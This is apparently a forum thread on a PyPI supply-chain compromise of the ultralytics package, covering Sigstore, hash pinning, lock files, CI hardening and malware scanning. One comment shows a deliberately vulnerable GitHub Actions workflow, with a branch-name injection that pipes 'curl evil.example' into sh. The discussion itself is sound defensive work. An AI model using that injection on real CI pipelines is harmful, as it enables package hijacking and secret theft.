Really cool to see all the hard work on Trusted Publishing and Sigstore pay off here. As a reminder, these tools were never meant to prevent attacks like this, only to make them easier to detect, harder to hide, and easier to recover from.
Just getting around to looking at this. There is a certificate in Sigstore for 8.3.41 claiming the package is a build of cb260c243ffa3e0cc84820095cd88be2f5db86ca -- https://search.sigstore.dev/?logIndex=153415340. But it isn't: the package contents differ from the contents of that commit. This doesn't seem to be working all that well.
As a user of PyPI, what’s a best practice to protect against compromised libraries?
I fear that freezing the version number is inadequate, because attackers (who, don't forget, control the dependency) could change the git tag and redeploy a commonly used version with different code.
Is it really viable to use hashes to lock requirements.txt?
Release files on PyPI are immutable: an attacker can’t overwrite a pre-existing file for a version. So if you pin to an exact version, you are (in principle) protected from downloading a new malicious one.
The main caveat to the above is that files are immutable on PyPI, but releases are not. So an attacker can’t overwrite an existing file (or delete and replace one), but they can always add a more specific distribution to a release if one doesn’t already exist. In practice, this means that a release that doesn’t have an arm64 wheel (for example) could have one uploaded to it.
TL;DR: pinning to a version is suitable for most settings; pinning to the exact set of hashes for that version’s file will prevent new files from being added to that version without you knowing.
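The check that hash pinning buys you can be sketched in a few lines: pip's `--require-hashes` mode computes the SHA-256 of each downloaded file and refuses anything whose digest isn't pinned. A minimal illustration of that logic (the file contents here are made up; this is not pip's actual code):

```python
import hashlib

# A hash-pinned requirements.txt line records something like:
#   somepkg==1.0.0 --hash=sha256:<digest>
# pip's --require-hashes mode rejects any file whose digest isn't listed.

def verify_artifact(data: bytes, pinned_digests: set[str]) -> bool:
    """Mimic pip's check: the file's SHA-256 must match a pinned digest."""
    return hashlib.sha256(data).hexdigest() in pinned_digests

# Simulate the pinned release file and a later, attacker-added file.
original = b"original sdist contents"
tampered = b"malicious sdist contents"
pins = {hashlib.sha256(original).hexdigest()}

print(verify_artifact(original, pins))  # True: matches the pin
print(verify_artifact(tampered, pins))  # False: unlisted file is rejected
```

In practice you don't write the hashes by hand: tools like pip-tools (`pip-compile --generate-hashes`) emit a fully hash-pinned requirements.txt, which you then install with `pip install --require-hashes -r requirements.txt`.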
Download the libraries' real source repos, apply static analysis tools, audit the source code manually, then build wheels from source instead of using prebuilt stuff from PyPI. Repeat for every update of every library. Publish your audits using crev, so others can benefit from them. Push the Python community to think about Reproducible Builds and Bootstrappable Builds.
This is where tools like Poetry and uv, with their lock files, shine. The lock files contain all transitive dependencies (like pip freeze), but they do it automatically.
Personally I'd move as much logic out of the YAML as possible into either pure shell scripts or scripts in other languages. Then use shellcheck or other appropriate linters for those scripts.
Maybe one day someone will write a proper linter for the shell-wrapped-in-yaml insanity that are these CI systems, but it seems unlikely.
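As a sketch of that refactor (a hypothetical GitHub Actions job, not from any particular project): the YAML stays dumb, each `run:` step is a single script invocation, and the scripts themselves are files that shellcheck can actually lint.

```yaml
# .github/workflows/ci.yml (hypothetical): no inline shell logic in YAML
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Lint the scripts themselves
        run: shellcheck scripts/*.sh
      - name: Build
        run: ./scripts/build.sh
```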
The attacker sent a PR to the ultralytics repository that triggered GitHub CI. This resulted in:
1) the attacker triggering a new version publication from the CI itself, and
2) the attacker obtaining the secret token used to publish to PyPI.
Sadly, popular open source projects are vulnerable to this vector. A popular package adopted by a large vendor (Red Hat/Microsoft) may see a PR from months or a year ago materialize in the vendor's product update pipeline. This is too easy to weaponize in a way that doesn't manifest until needed, or only in a different environment.
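One well-known dangerous pattern that enables exactly this class of attack (a hedged sketch, not necessarily the precise workflow involved in this incident): a `pull_request_target` workflow runs with access to the repository's secrets, and interpolating attacker-controlled PR data directly into a `run:` step lets any PR author inject shell commands.

```yaml
# Hypothetical vulnerable workflow: runs with secrets on attacker PRs
on: pull_request_target
jobs:
  greet:
    runs-on: ubuntu-latest
    steps:
      # ${{ github.head_ref }} is attacker-controlled; a branch named
      # x";curl evil.example|sh;" becomes shell code inside this step.
      - run: echo "Testing branch ${{ github.head_ref }}"
```

GitHub's own hardening guidance is to pass untrusted values through environment variables rather than template interpolation, and to be very wary of combining `pull_request_target` with a checkout of PR code.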
We scan PyPI packages regularly for malware to provide a private registry of vetted packages.
The tech is open-sourced: Packj [1]. It uses static+dynamic code/behavioral analysis to scan for indicators of compromise (e.g., spawning of shell, use of SSH keys, network communication, use of decode+eval, etc). It also checks for several metadata attributes to detect impersonating packages (typo squatting).
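As a toy illustration of the static side of this kind of analysis (my own sketch, not Packj's actual implementation), a few lines of Python AST walking can flag the decode+eval indicator mentioned above:

```python
import ast

SUSPECT_CALLS = {"eval", "exec"}

def flags_decode_eval(source: str) -> bool:
    """Flag eval/exec whose argument involves a *.decode()/b64decode()-style
    call -- a toy version of the 'decode+eval' indicator of compromise."""
    tree = ast.parse(source)
    for node in ast.walk(tree):
        if (isinstance(node, ast.Call)
                and isinstance(node.func, ast.Name)
                and node.func.id in SUSPECT_CALLS):
            # Look for a decode-like method call anywhere inside the argument.
            for inner in ast.walk(node):
                if (isinstance(inner, ast.Call)
                        and isinstance(inner.func, ast.Attribute)
                        and "decode" in inner.func.attr):
                    return True
    return False

print(flags_decode_eval("eval(base64.b64decode(payload))"))  # True
print(flags_decode_eval("print('hello')"))                   # False
```

Real scanners combine many such indicators (network calls, subprocess spawning, filesystem access) and, as the comment notes, pair static checks with dynamic/behavioral analysis, since obfuscation can defeat any single AST pattern.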
If the tech is open-sourced, then an attacker can keep trying in private until they find an exploit, and then use it.
Also, you only know if your security measures work if you test them. I'd feel much safer if there was regular pen-testing by security researchers. We're talking about potential threats from nation state actors here.
Trim your requirements.txt
https://github.com/crev-dev/
https://reproducible-builds.org/
https://bootstrappable.org/
Lock files may contain hashes.
Honestly safety in CI/CD seems near impossible anyways.
https://docs.gitlab.com/ee/ci/yaml/lint.html
1. https://github.com/ossillate-inc/packj
https://github.com/pypi-data